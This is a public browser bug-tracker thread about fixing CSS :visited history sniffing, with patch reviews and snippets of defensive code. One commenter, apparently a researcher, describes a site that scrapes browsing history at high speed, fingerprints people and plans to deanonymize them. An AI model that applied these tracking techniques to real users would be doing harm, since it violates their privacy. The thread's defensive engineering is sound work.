> * Which properties other than colors are worth supporting? How about
> text-decoration or border-style, for example?
Those are both detectable through performance characteristics. Allowing them to be set would not fix the exploit in any useful way.
> * Are the cases involving the sibling selectors worth considering? (Maybe not,
> but the point is that it could be based on the actual data.)
If I knew a reasonable way to do it, that would be a question worth asking, but I don't. Do you? I don't think it can be done without significant increase in code complexity for something that I'm reasonably confident is quite rare (although I don't know exactly how rare).
Comment 161•15 years ago
|
||
(In reply to comment #160)
> (In reply to comment #159)
> > * Which properties other than colors are worth supporting? How about
> > text-decoration or border-style, for example?
>
> Those are both detectable through performance characteristics.
I did not know that. If so, I agree that this question is irrelevant because we cannot handle these properties anyway.
> > * Are the cases involving the sibling selectors worth considering? (Maybe not,
> > but the point is that it could be based on the actual data.)
>
> If I knew a reasonable way to do it, that would be a question worth asking, but
> I don't. Do you?
I do not either, but I think that you or someone else can come up with a clever way to handle those cases if necessary, especially if we know a common usage pattern.
Comment 162•15 years ago
|
||
(In reply to comment #159)
> * Which properties other than colors are worth supporting? How about
> text-decoration or border-style, for example?
I'm pretty sure that websites are using a very large number of properties in :visited - but I guess it would be best to actually go out and pull definitions from real cases and analyze those.
Assignee | ||
Comment 163•15 years ago
|
||
The question isn't what properties are used with :visited, but what properties are used with :visited whose values are different from those used on :link. Selectors like ":link, :visited" are common, but those won't be affected by this approach.
Comment 164•15 years ago
|
||
Sorry to clutter any inboxes, but this issue has gotten some pretty widespread exposure due to the site http://didyouwatchporn.com/.
Comment 165•15 years ago
|
||
Maybe a superfluous comment, similar to the previous one and the bug’s URL, but I don’t see this particular site mentioned before:
http://www.whattheinternetknowsaboutyou.com/top20k
Incredible how fast it is and how many results it returns. Also works without JavaScript. Many more results than from the site in the previous comment :). (Had just one there, “myfreecams”? Must’ve been an ad banner or popup. Honestly!)
Comment 166•15 years ago
|
||
I don't think my comment ever got posted, but my solution would be to build in the idea behind SafeHistory, with an option for the user to turn it on in the security settings and a link explaining what will happen if it's turned on, like AcidTest3. It's not really a bug in Firefox; it's a bug in the HTML spec, and that should be fixed there, but in the meantime this quick-and-dirty solution works just fine. Firefox would then be the only browser capable of blocking this exploit.
We can't fix it because the spec is broken, so let's work around it in the meantime.
Comment 167•15 years ago
|
||
The spec is so badly broken here that for once I say toss the spec. Protecting users' privacy is far more important. I wouldn't even suggest spec compliance as an option.
Comment 168•15 years ago
|
||
Excuse my bluntness, but you have been arguing about this issue for almost 8 years now.
What I see from the user perspective is a serious, serious privacy issue.
So what I want you to do is make a setting in about:config similar to browser.send_pings. This setting removes or restricts access to the relevant CSS property. This will break websites that rely on it, but that is acceptable, as it will not be set by default. This has to be built into the next release and not just offered as a patch.
Once you have done that, you can go on implementing some fancy same-origin-policy approach, SafeHistory, SafeCache, whatever.
Assignee | ||
Comment 169•15 years ago
|
||
(In reply to comment #168)
> So what I want you to do is make a setting in about:config similar to
> browser.send_pings. This setting removes or restricts access to the
Sounds like you want layout.css.visited_links_enabled, which has been around for a while (comment 106).
Comment 170•15 years ago
|
||
(In reply to comment #169)
I was not aware of this. It is not perfect, because it not only restricts read access from the API but also stops displaying link colors to the user.
But hey, this is exactly what I have been looking for.
Thank you for the hint and sorry for the bug tracker chatter.
Updated•15 years ago
|
Whiteboard: [sg:want P4][please read comments 12, 23, 35, 43, 65-68, 70, 102-103 before commenting] → [sg:want P1][please read comments 12, 23, 35, 43, 65-68, 70, 102-103 before commenting]
Updated•15 years ago
|
Assignee | ||
Comment 172•15 years ago
|
||
I'm going to attach a series of patches that I believe fix this bug.
The approach taken by these patches is described in detail in
http://dbaron.org/mozilla/visited-privacy , which I'll probably
eventually turn into a blog entry or something similar.
I've generated tryserver builds containing these patches (and a few
others, in particular, those for bug 550497, bug 534804, and bug 544834)
on top of a random trunk changeset (in particular,
http://hg.mozilla.org/mozilla-central/rev/02c434f2fd4a ), based on the
state of these patches in my patch queue at
http://hg.mozilla.org/users/dbaron_mozilla.com/patches/rev/6205844d887e .
The builds are here (though they'll be deleted around March 22, I think):
https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-7a25c034a494/
These builds could be badly broken and do horrible things, so I don't
recommend using them. However, if you really feel the need to test the
patch right now, they're probably your best choice. However, absolutely
do not install them as your main browser, since you'll be stuck without
any security updates in the future.
Assignee | ||
Comment 173•15 years ago
|
||
Attachment #431523 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 174•15 years ago
|
||
Attachment #431524 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 175•15 years ago
|
||
Attachment #431525 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 176•15 years ago
|
||
Attachment #431527 -
Flags: review?(roc)
Assignee | ||
Comment 177•15 years ago
|
||
Attachment #431528 -
Flags: review?(zweinberg)
Assignee | ||
Comment 178•15 years ago
|
||
Assignee | ||
Comment 179•15 years ago
|
||
Attachment #431531 -
Flags: review?(zweinberg)
Attachment #431527 -
Flags: review?(roc) → review+
Assignee | ||
Comment 180•15 years ago
|
||
Attachment #431532 -
Flags: review?(zweinberg)
Assignee | ||
Comment 181•15 years ago
|
||
Attachment #431533 -
Flags: review?(bernd_mozilla)
Assignee | ||
Comment 182•15 years ago
|
||
Attachment #431535 -
Flags: review?(zweinberg)
Assignee | ||
Comment 183•15 years ago
|
||
Attachment #431536 -
Flags: review?(bzbarsky)
Assignee | ||
Updated•15 years ago
|
Attachment #431529 -
Flags: review?(zweinberg)
Assignee | ||
Comment 184•15 years ago
|
||
Attachment #431537 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 185•15 years ago
|
||
Attachment #431538 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 186•15 years ago
|
||
Attachment #431539 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 187•15 years ago
|
||
Attachment #431540 -
Flags: review?(sdwilsh)
Assignee | ||
Comment 188•15 years ago
|
||
Attachment #431541 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 189•15 years ago
|
||
Attachment #431542 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 190•15 years ago
|
||
Attachment #431543 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 191•15 years ago
|
||
Attachment #431544 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 192•15 years ago
|
||
Attachment #431545 -
Flags: review?(bzbarsky)
Comment 193•15 years ago
|
||
- PRBool foreground;
- styleData->GetBorderColor(aSide, aColor, foreground);
- if (foreground) {
- aColor = aFrame->GetStyleColor()->mColor;
- }
+ aColor = aFrame->GetStyleContext()->GetVisitedDependentColor(
+ nsCSSProps::SubpropertyEntryFor(eCSSProperty_border_color)[aSide]);
}
where did that 'if(foreground)' clause go? Is that no longer necessary?
Assignee | ||
Comment 194•15 years ago
|
||
It's no longer necessary; see the comment added in patch 7, and the underlying code which is already in nsStyleAnimation.cpp (called from the code in patch 3): nsStyleAnimation::ExtractComputedValue, case eStyleAnimType_Custom, calls to ExtractBorderColor, and the ExtractBorderColor function itself in the same file.
Comment 195•15 years ago
|
||
Comment on attachment 431540 [details] [diff] [review]
patch 15: fix initialization comment in nsRuleProcessorData
r=sdwilsh
Attachment #431540 -
Flags: review?(sdwilsh) → review+
Comment 196•15 years ago
|
||
OK, how do I unsubscribe from this damned thing? Unchecking "Add me to CC list" and clicking "Commit" doesn't seem to work.
Assignee | ||
Comment 197•15 years ago
|
||
(In reply to comment #196)
> OK, how do I unsubscribe from this damned thing? Unchecking "Add me to CC list"
> and clicking "Commit" doesn't seem to work.
It appears you're getting email because you voted for this bug. To stop getting such email you could either:
* stop voting for the bug by clicking the "(vote)" link next to "Importance" near the top
* change your Bugzilla email preferences so you don't get email for bugs you've voted for ("Preferences" link at bottom of page)
However, you *also* just added yourself to the cc: list. So you'd also need to remove yourself from that ("(edit)", highlight your name, and check "Remove selected CCs") or, again, change your bugzilla email preferences accordingly.
Comment 198•15 years ago
|
||
Comment on attachment 431529 [details] [diff] [review]
patch 6: draw 'background-color' using the visited-dependent style
As discussed on IRC, change NS_GET_A(bgcolor) == 255 to NS_GET_A(bgcolor) > 0 in nsObjectFrame::CreateWidget. Otherwise looks good.
Attachment #431529 -
Flags: review?(zweinberg) → review+
Updated•15 years ago
|
Attachment #431528 -
Flags: review?(zweinberg) → review+
Comment 199•15 years ago
|
||
Comment on attachment 431531 [details] [diff] [review]
patch 7: prerequisite comments for drawing 'border-*-color' using the visited-dependent style
>+PR_STATIC_ASSERT(NS_SIDE_TOP == 0);
>+PR_STATIC_ASSERT(NS_SIDE_RIGHT == 1);
>+PR_STATIC_ASSERT(NS_SIDE_BOTTOM == 2);
>+PR_STATIC_ASSERT(NS_SIDE_LEFT == 3);
This is already checked in at least one other place that I know of, but if you want it here as well (presumably because of the equivalence with the eCSSProperty_border_*_color values) I guess I don't mind.
Attachment #431531 -
Flags: review?(zweinberg) → review+
Updated•15 years ago
|
Attachment #431532 -
Flags: review?(zweinberg) → review+
Updated•15 years ago
|
Attachment #431535 -
Flags: review?(zweinberg) → review+
Updated•15 years ago
|
Assignee | ||
Comment 200•15 years ago
|
||
I found two mistakes in the previous version of this patch while writing tests:
* RuleProcessorData::GetContentStateForVisitedHandling needs to consider whether the node is the relevant link
* RuleProcessorData::GetContentStateForVisitedHandling needs to call ContentState() rather than looking at mContentState.
I caught the first because it failed a test I wrote, and the second because it triggered an assertion I wrote in the code while I was fixing the first.
The current state of my tests is:
http://hg.mozilla.org/users/dbaron_mozilla.com/patches/raw-file/7eb28678760d/visited-reftests
but I still have more to write.
Attachment #431545 -
Attachment is obsolete: true
Attachment #433167 -
Flags: review?(bzbarsky)
Attachment #431545 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 201•15 years ago
|
||
This adds the following code to nsStyleSet::GetContext:
if (aIsLink) {
// If this node is a link, we want its visited's style context's
// parent to be the regular style context of its parent, because
// only the visitedness of the relevant link should influence style.
parentIfVisited = aParentContext;
}
in order to fix the bug that I was setting the parent style context incorrectly for the if-visited style data for links that were descendants of other links.
Attachment #431541 -
Attachment is obsolete: true
Attachment #433210 -
Flags: review?(bzbarsky)
Attachment #431541 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 202•15 years ago
|
||
... and this weakens the first "parent mismatch" assertion in nsStyleContext::SetStyleIfVisited which was correspondingly incorrect.
Attachment #431524 -
Attachment is obsolete: true
Attachment #433212 -
Flags: review?(bzbarsky)
Attachment #431524 -
Flags: review?(bzbarsky)
Comment 203•15 years ago
|
||
Hi all. This has been a very interesting thread to read through. dbaron seems to understand the scope of this issue.
To add a little bit, here's my new (open source) research site:
http://cssfingerprint.com
Things it does right now:
* SVM-based AI to identify who you are vs previous people it's seen, and who is similar
- note that I am NOT trying to fingerprint your browser, but to fingerprint you-the-human through your browsing behavior; this is dramatically more powerful than Panopticlick.
* extremely fast URL scraper - browser-locally I can currently scrape ~200k-3.5M links per minute (depending on browser; Firefox is ~400k, lagging far behind Safari/Chrome)
- caveat: a) the server I'm using can't keep up with this speed, and b) I'm testing 4x variants per link right now; actual current full-circle performance is ~50-200k (4x-tested) links/min. But this is definitely a temporary restriction; I fully expect to get within 80% of the local speed after more server side improvements.
* demographics determination based on Quantcast data (very slow server side right now 'cause it's just deployed and I'm not yet caching some critical path data)
In the near future it will also:
* do bootstrapping intelligent URL scraping (i.e. if Y is a more likely hit for visitors of X, test Y if you get positive for X)
- right now the search is fairly dumb - first by other users' hits, then by a combination of alexa/google/technorati/bloglines/quantcast ranking - with only ~16-800 hits per 1 minute scraping. And I only test domains that show up in those rankings (plus a dozen or so custom ones), not longer URLs. I expect my hit rate to improve dramatically with a smarter and broader search algorithm.
* do full visitor deanonymization along the lines of iseclab's experiment [0]
- except I'm not going to limit myself to Xing, and will be trying to use results across different social networks
* integrate other active and passive fingerprinting attacks (right now it is *strictly* CSS-history based), like p0f etc
* have hooks for automated testing with a privacy testing framework being developed by Len Sassaman
* use a few other AI methods for user identification (the current AI is not all that great)
My perspective here is as an attacker rather than a defender - though I'm very friendly to the desire for privacy (I run a Tor node, I have friends in the EFF, etc).
Regarding things that have been discussed so far:
* dbaron is correct that anything short of either VERY strict whitelisting, a "same-origin policy", or full dropping of :visited support will fail. If you allow anything that changes the DOM or rendered structure, I will detect it.
* IMHO a same-origin policy breaks both user expectations and a significant part of functionality - but that's a tradeoff that's not my call.
* I can't currently think of a way to attack the potential fix of permitting only 'color' on :visited, and keeping a 'non-visited-color' property on all elements that you use to lie to Javascript. FWIW, Dan Kaminsky thinks he can find a hole in it, but hasn't managed yet from our discussions so far.
* I don't know anything about Firefox backend rendering speed issues, so my comments are not taking them into account. However, I would point out that Firefox is right now dramatically slower than Safari/Chrome on my tests.
Enjoy,
Sai
[0] http://www.iseclab.org/people/gilbert/experiment
Comment 204•15 years ago
|
||
> dbaron is correct that anything short of either VERY strict whitelisting, a
> "same-origin policy", or full dropping of :visited support will fail.
Do you see a way to circumvent dbaron's current approach and patches, concretely?
Comment 205•15 years ago
|
||
Sorry, I didn't read far enough:
> I can't currently think of a way to attack the potential fix
Comment 206•15 years ago
|
||
Ben: I do not. I haven't looked at the patches that deal with backend code, but from his discussion of his approach, it seems solid.
Of course it'd probably be a good idea to give us (i.e. people working on the attack) a RC version before calling it 'fixed'. This isn't really the sort of thing that is amenable to an easy automated answer; it's more a case of it wins if it survives being poked at for a while... until someone comes up with a cleverer attack, of course. ;-)
Comment 207•15 years ago
|
||
(In reply to comment #206)
> Of course it'd probably be a good idea to give us (i.e. people working on the
> attack) a RC version before calling it 'fixed'.
see comment 172
Comment 208•15 years ago
|
||
I was talking to Sai about this and he suggested I make a comment here -- so I haven't read through and understood the current state of discussion, apologies.
Anyway, I find one property of the "limit CSS properties of visited links to color etc." very sketchy, namely that it suddenly becomes a _security-critical behaviour_ that color not affect size or other properties of links. It's a sensible assumption, to be sure, but I could certainly imagine some version of some OS breaking it. Maybe, for instance, the antialiaser exhibits some subtle dependency from color to size, characters of a more contrasting color having a tiny tiny subpixel difference in width -- voila, security hole.
Comment 209•15 years ago
|
||
As I understand things, we don't provide colour information to the font subsystem when asking it for width, so it can't vary in that way. We, not the OS, control where elements in the page are rendered, so in the case you describe it would simply draw beyond our expected bounds, not affect placement of any elements on the page.
Does that address your concern?
Comment 210•15 years ago
|
||
I had a friend bring up what Web designers actually want out of :link/:visited differentiation on MetaFilter: http://ask.metafilter.com/148349/Web-designers-how-do-you-use-CSS-with-link-and-visited
Comment 211•15 years ago
|
||
dbaron wrote in comment 172:
> I've generated tryserver builds containing these patches (and a few
> others, in particular, those for bug 550497, bug 534804, and bug 544834)
> The builds are here (though they'll be deleted around March 22, I think):
> https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-7a25c034a494/
Given that we're approaching March 22, I mirrored them on my server:
http://www.bucksch.org/xfer/visited/
fc93ba7f269e335078f9ed48f3332ea4 try-7a25c034a494-linux.tar.bz2
5c25f7d0e60308df45c1f8d25a241b07 try-7a25c034a494-macosx.dmg
f6f9d2808c2c97b6c8dc68410a610dd1 try-7a25c034a494-win32.zip
Comment 212•15 years ago
|
||
(In reply to comment #208)
> Anyway, I find one property of the "limit CSS properties of visited links to
> color etc." very sketchy, namely that it suddenly becomes a _security-critical
> behaviour_ that color not affect size or other properties of links.
I don't think this would necessarily always be the case, although in some cases I suspect it might well be (and note you shouldn't consider my assertions as authoritative). In the first case it's a privacy violation, which we usually classify as distinct from a security issue. (One still might be the other, of course, on a case-by-case basis.) In the second case it's possible there might be mitigating factors (accuracy of exploitation perhaps -- or, as with this partial fix, requiring some form of user interaction) that would make it harder to exploit the leak. If there were such, that might further downgrade severity.
But overall, I think we'd have to treat such problems individually rather than presumptively adopt one generalized rule.
Assignee | ||
Comment 213•15 years ago
|
||
This draws both the color and the fallback color for 'fill' and 'stroke' using visited-dependent colors. (See http://dbaron.org/mozilla/visited-privacy for more details.)
I'm not sure whether I should be doing the fallback color (since I'm not honoring the change in paint servers); I'm reasonably confident that doing the color is the right thing, though.
Attachment #434899 -
Flags: review?(jwatt)
Assignee | ||
Comment 214•15 years ago
|
||
Assignee | ||
Comment 215•15 years ago
|
||
Assignee | ||
Comment 216•15 years ago
|
||
Attachment #434902 -
Flags: review?(jwatt)
Assignee | ||
Comment 217•15 years ago
|
||
More up-to-date builds (although without the 'fill' and 'stroke' changes attached above) are at:
https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-5200664a0844/
These are based on:
http://hg.mozilla.org/mozilla-central/file/b3367021d661
http://hg.mozilla.org/users/dbaron_mozilla.com/patches/file/2e65d827e0a6
(bottom 28 patches in queue)
All the warnings in comment 172 apply to these as well.
Assignee | ||
Comment 218•15 years ago
|
||
And another round of builds with the 'fill' and 'stroke' changes at:
https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-e2866d339b67/
(Mac not there yet, but should be soon).
Again, same warnings from comment 172 apply.
Assignee | ||
Comment 219•15 years ago
|
||
I converted some existing tests that needed conversion using nsWindowSnapshot, but that would have been painful for some of the ones that remained, so I added this API to DOMWindowUtils to make the conversion easier.
I think the diversity of having some tests do it one way and some the other is probably good.
Attachment #435047 -
Flags: review?(bzbarsky)
Assignee | ||
Comment 220•15 years ago
|
||
As I said in the previous comment, I did some conversion using WindowSnapshot and then decided to do the rest using a DOMWindowUtils API.
Attachment #435048 -
Flags: review?(sdwilsh)
Updated•15 years ago
|
Attachment #435048 -
Flags: review?(sdwilsh) → review+
Comment 221•15 years ago
|
||
Comment on attachment 435048 [details] [diff] [review]
patch 3.75: fix tests currently in the tree to deal with the new rules
r=sdwilsh
Assignee | ||
Comment 222•15 years ago
|
||
And here's one final try server build (for now):
https://build.mozilla.org/tryserver-builds/dbaron@mozilla.com-try-3a14a6acc0ac/
which no longer contains the patches for bug 534804 and bug 544834, but instead only the patches for this bug.
It's a build of http://hg.mozilla.org/mozilla-central/file/b3367021d661 plus the bottom 26 patches of my patch queue in its state at http://hg.mozilla.org/users/dbaron_mozilla.com/patches/file/33fbcac84993
Again, same warnings from comment 172 apply.
Comment 223•15 years ago
|
||
Comment on attachment 434899 [details] [diff] [review]
patch 10.5: draw 'fill' and 'stroke' colors using visited-dependent style
>+ if (paintIfVisited.mType == paint.mType) {
This doesn't look right to me. If |paintIfVisited.mType == eStyleSVGPaintType_Server| I think we should be using GetPaintServer with the visited paint server URL. Otherwise, if the base fill/stroke specifies an invalid paint server, a matching visited style specifying a valid paint server will never override the invalid base style and use its valid paint server. (Maybe you could also check that in the test that you modified?)
Assignee | ||
Comment 224•15 years ago
|
||
The point is that we don't allow :visited styles to influence anything other than simple colors; if it's switching to a different paint server that could cause URL loading or cause measurable performance differences.
It's not clear to me whether it's better to allow the styles only to influence the color that's the primary, or also let them influence the color that's the fallback (even though it's not allowed to influence the paint server that the color is a fallback for).
Comment 225•15 years ago
|
||
I see. Personally I think they should be able to influence the fallback.
I only have one other question: what is the purpose of the |if (paintIfVisited.mType == paint.mType)| around the code that that |if| statement gates? It looks to me like the |isServer ?| part takes care of doing the right thing, and the |if| check should just be removed.
Assignee | ||
Comment 226•15 years ago
|
||
(In reply to comment #225)
> I see. Personally I think they should be able to influence the fallback.
>
> I only have one other question: what is the purpose of the |if
> (paintIfVisited.mType == paint.mType)| around the code that that |if| statement
> gates? It looks to me like the |isServer ?| part takes care of doing the right
> thing, and the |if| check should just be removed.
The purpose is that I'm only swapping from primary-to-primary or fallback-to-fallback if they differ based on :visited styles; I'm never swapping primary-to-fallback or fallback-to-primary. Again, that could be changed, but it seemed like the right thing to me. (If I wanted to change it, I'd need a second |isServer| corresponding to the value of paintIfVisited.)
Comment 227•15 years ago
|
||
Comment on attachment 431523 [details] [diff] [review]
patch 1: split nsStyleSet::ResolveStyleForRules into two different APIs
r=bzbarsky
Attachment #431523 -
Flags: review?(bzbarsky) → review+
Comment 228•15 years ago
|
||
Comment on attachment 433212 [details] [diff] [review]
patch 2: add mechanism for separate style context for visited style
>+++ b/layout/style/nsStyleContext.cpp
>+ if (thisVis) {
>+ if (otherVis) {
How about:
if (!thisVis != !otherVis) {
// Presume a difference
NS_UpdateHint(hint, NS_STYLE_HINT_VISUAL);
} else if (thisVis) {
// The change stuff goes here.
}
>+ // NB: Calling Peek on |this|, not |thisVis|.
Why? This seems like it could use a good "why" comment, not a "what" comment... I assume something to the effect that someone might have gotten the struct off us even if they never got it off thisVis?
Does it make sense to add !change checks on the PeekStyleBackground/PeekStyleBorder conditionals?
>+ nsStyleContext* StyleIfVisited()
>+ { return mStyleIfVisited; }
It might be good to document whatever invariants this style context satisfies (e.g. the ones we assert in SetStyleIfVisited).
r=bzbarsky
Attachment #433212 -
Flags: review?(bzbarsky) → review+
Comment 229•15 years ago
|
||
Comment on attachment 431525 [details] [diff] [review]
patch 3: add function to nsStyleUtil for choosing appropriate color based on visitedness
r=bzbarsky
Attachment #431525 -
Flags: review?(bzbarsky) → review+
Assignee | ||
Comment 230•15 years ago
|
||
(In reply to comment #228)
> >+ // NB: Calling Peek on |this|, not |thisVis|.
>
> Why? This seems like it could use a good "why" comment, not a "what"
> comment... I assume something to the effect that someone might have gotten the
> struct off us even if they never got it off thisVis?
I think both that, and because thisVis might be null, and because when they got it there might not have been a style-if-visited (or something like that)?
Updated•15 years ago
|
Attachment #435047 -
Flags: review?(bzbarsky) → review+
Comment 231•15 years ago
|
||
Comment on attachment 435047 [details] [diff] [review]
patch 3.5: add API to nsDOMWindowUtils to ease conversion of existing tests
r=bzbarsky
Comment 232•15 years ago
|
||
Comment on attachment 431536 [details] [diff] [review]
patch 11: introduce TreeMatchContext for output from SelectorMatchesTree
This seems fine, but why a pointer instead of a non-const reference? The latter would make it clear that null is not an issue...
Attachment #431536 -
Flags: review?(bzbarsky) → review+
Comment 233•15 years ago
|
||
Comment on attachment 431537 [details] [diff] [review]
patch 12: introduce NodeMatchContext for additional input into SelectorMatches
> In other words,
>+ * a single node might have multiple value NodeMatchContext at one time,
>+ * but only one possible RuleProcessorData.
Maybe "In other words, there might be multiple NodeMatchContexts corresponding to a single node, but only one possible RuleProcessorData"? Or something like that.
And again, why a pointer instead of a reference?
Attachment #431537 -
Flags: review?(bzbarsky) → review+
Comment 234•15 years ago
|
||
Comment on attachment 431538 [details] [diff] [review]
patch 13: propagate whether we have a relevant link out of selector matching
>+ // Always false when TreeMatchContext::mForStyling is false.
Assert this as needed, please?
r=bzbarsky
Attachment #431538 -
Flags: review?(bzbarsky) → review+
Comment 235•15 years ago
|
||
Comment on attachment 431539 [details] [diff] [review]
patch 14: make nsStyleContext::FindChildWithRules deal with the visited style context
I think the arguments here could use some documenting. r=bzbarsky with that.
Attachment #431539 -
Flags: review?(bzbarsky) → review+
Comment 236•15 years ago
|
||
(In reply to comment #226)
> Again, that could be changed, but it seemed like the right thing to me.
I've thought about this some more, and I think that our behavior should be described by the following "end user" doc:
"Paint servers specified in :visited styles are ignored. Such a paint server's fallback color (black by default) is then used only if it overrides a simple color. If the fallback color would override another paint server, then the fallback color is also ignored."
In other words I think if the primary is a color and the visited is a paint server, we should use the fallback; and if the primary is a paint server where the fallback would be used (i.e. we're inside SetupFallbackOrPaintColor) and the visited is a color, I think the color should be used.
If you would rather keep things as you currently have them, can you explain why in a bit more detail? What I've described makes most sense to me, and is behavior that is more easily described to end users I think.
Assignee | ||
Comment 237•15 years ago
|
||
(In reply to comment #236)
> "Paint servers specified in :visited styles are ignored. Such a paint server's
> fallback color (black by default) is then used only if it overrides a simple
> color. If the fallback color would override another paint server, then the
> fallback color is also ignored."
This would cause fallback colors to be used in cases where they weren't before (e.g., if the :link style is a color and the :visited style is a gradient). I think it's a bad idea to start using fallback colors more than they were previously used, since existing content tends not to set them, so it's likely to lead to bad results.
> In other words I think if the primary is a color and the visited is a paint
> server, we should use the fallback; and if the primary is a paint server where
> the fallback would be used (i.e. we're inside SetupFallbackOrPaintColor) and
> the visited is a color, I think the color should be used.
If the primary (i.e., :link) is a paint server, we have to use that paint server even if the link is :visited, since not using it would lead to measurable performance differences.
> If you would rather keep things as you currently have them, can you explain why
> in a bit more detail? What I've described makes most sense to me, and is
> behavior that is more easily described to end users I think.
So my requirement (for performance measurement) is that we never change which paint server is used based on visitedness, or whether one is used.
I'd also like to avoid using fallback colors in cases where they weren't before (as I mentioned above).
I think that leaves two reasonable possibilities:
(1) what I did, i.e., using the :visited's color to substitute the :link's color, and the :visited's fallback color to substitute for the :link's fallback color
(2) using :visited information only when the color is the primary value for both
I'm actually starting to think that maybe (2) makes more sense, because perhaps we shouldn't make fallbacks take effect when the servers themselves don't take effect. That would mean changing:
+ if (paintIfVisited.mType == paint.mType) {
+ nscolor colorIfVisited = isServer ? paintIfVisited.mFallbackColor
+ : paintIfVisited.mPaint.mColor;
to:
+ if (paintIfVisited.mType == eStyleSVGPaintType_Color &&
+ paint.mType == eStyleSVGPaintType_Color) {
+ nscolor colorIfVisited = paintIfVisited.mPaint.mColor;
Comment 238•15 years ago
(In reply to comment #237)
> This would cause fallback colors to be used in cases where they weren't before
> (e.g., if the :link style is a color and the :visited style is a gradient). I
> think it's a bad idea to start using fallback colors more than they were
> previously used, since existing content tends not to set them, so it's likely
> to lead to bad results.
I think that would be okay, since it would raise awareness of the rules and discourage people from writing content that tries to use paint servers in :visited style, or override a paint server with a :visited style color.
> > In other words I think if the primary is a color and the visited is a paint
> > server, we should use the fallback; and if the primary is a paint server where
> > the fallback would be used (i.e. we're inside SetupFallbackOrPaintColor) and
> > the visited is a color, I think the color should be used.
>
> If the primary (i.e., :link) is a paint server, we have to use that paint
> server even if the link is :visited, since not using it would lead to
> measurable performance differences.
Sure, I agree that if the primary paint server is valid we need to use it and completely ignore the :visited style. By "where the fallback would be used" I was explicitly referring to the case when the primary paint server is not valid and won't be used though.
> (2) using :visited information only when the color is the primary value for
> both
I'd be okay with that. In fact that makes the rules even simpler to explain to users.
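For illustration, a sketch of how option (2) behaves in author CSS; the selectors and the #stripes gradient are examples, not taken from the patch:
/* Both values are simple colors, so the :visited color is honored. */
svg a:link text { fill: blue; }
svg a:visited text { fill: purple; }
/* A paint server is involved, so the :visited value is ignored and the
   :link paint (the gradient, or its red fallback if #stripes is missing)
   is used whether or not the link was visited. */
svg a:link rect { fill: url(#stripes) red; }
svg a:visited rect { fill: purple; }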
Assignee
Comment 239•15 years ago
... take option (2)
Attachment #434899 -
Attachment is obsolete: true
Attachment #436071 -
Flags: review?
Attachment #434899 -
Flags: review?(jwatt)
Assignee
Updated•15 years ago
Attachment #436071 -
Flags: review? → review?(jwatt)
Comment 240•15 years ago
Comment on attachment 436071 [details] [diff] [review]
patch 10.5: draw 'fill' and 'stroke' colors using visited-dependent style
>+ // Only use :visited information if both the :link and :visited
>+ // values are color values.
That pretty much just repeats what the code says, but doesn't say _why_ this is the case. How about something like:
// To prevent Web content from detecting if a user has visited a URL we do
// not allow :visited style to specify a paint server, nor do we allow it
// to override a paint server with a simple color. A :visited style may
// only override a simple color with another simple color.
Attachment #436071 -
Flags: review?(jwatt) → review+
Comment 241•15 years ago
Comment on attachment 434902 [details] [diff] [review]
patch 23: convert existing SVG reftest to use test_visited_reftests (from patch 21)
r=jwatt. Thanks for your patience in explaining your thinking.
Attachment #434902 -
Flags: review?(jwatt) → review+
Attachment #431533 -
Flags: review?(bernd_mozilla) → review+
Assignee
Comment 242•15 years ago
One review comment of my own: I realize I should rename nsStyleContext::StyleIfVisited to nsStyleContext::GetStyleIfVisited, per our convention that functions returning pointers should be named Get* iff they might return null.
Assignee
Comment 243•15 years ago
(In reply to comment #228)
> if (!thisVis != !otherVis) {
> // Presume a difference
> NS_UpdateHint(hint, NS_STYLE_HINT_VISUAL);
> } else if (thisVis) {
> // The change stuff goes here.
> }
Done. While I was there, I also added an NS_IsHintSubset() call to the |else if| you propose, used eChangeHint_RepaintFrame instead of NS_STYLE_HINT_VISUAL throughout the new chunk, listed the properties I've since made visited-dependent but hadn't listed there, and added an assertion to GetVisitedDependentColor to remind me not to make that mistake again.
Also locally addressed all other review comments.
Comment 244•15 years ago
Comment on attachment 433210 [details] [diff] [review]
patch 16: add link visitedness to nsRuleWalker and actually construct the if-visited contexts
>+++ b/layout/style/nsRuleWalker.h
>+ // true on the RuleProcessorData *for the node being matched* if a a
s/a a/a/
r=bzbarsky
Attachment #433210 -
Flags: review?(bzbarsky) → review+
Comment 245•15 years ago
Comment on attachment 431542 [details] [diff] [review]
patch 17: propagate whether we have a relevant link to the style set
r=bzbarsky
Attachment #431542 -
Flags: review?(bzbarsky) → review+
Comment 246•15 years ago
Comment on attachment 431543 [details] [diff] [review]
patch 18: set NS_STYLE_RELEVANT_LINK_IS_VISITED on style contexts as appropriate
r=bzbarsky
Attachment #431543 -
Flags: review?(bzbarsky) → review+
Comment 247•15 years ago
Comment on attachment 431544 [details] [diff] [review]
patch 19: put expected type of visited matching in the TreeMatchContext
r=bzbarsky
Attachment #431544 -
Flags: review?(bzbarsky) → review+
Comment 248•15 years ago
Comment on attachment 433167 [details] [diff] [review]
patch 20: make selector matching operations follow the new rules
r=bzbarsky
Attachment #433167 -
Flags: review?(bzbarsky) → review+
Assignee
Comment 249•15 years ago
Pushed 26 changesets to mozilla-central:
http://hg.mozilla.org/mozilla-central/pushloghtml?changeset=85754ddc898e
Comment 250•15 years ago
a:visited { outline: 1px dotted black !important;} in userContent.css
does not work anymore
Assignee
Comment 251•15 years ago
(In reply to comment #250)
> a:visited { outline: 1px dotted black !important;} in userContent.css
> does not work anymore
That's as expected. It would work if you change it to:
a:link, a:visited { outline: 1px dotted ! important }
a:link { outline-color: transparent ! important }
a:visited { outline-color: black ! important }
Comment 252•15 years ago
Maybe outline should be a special case? Because outline (unlike border) does not move the content at all, it could be allowed to change only its color.
Assignee
Comment 253•15 years ago
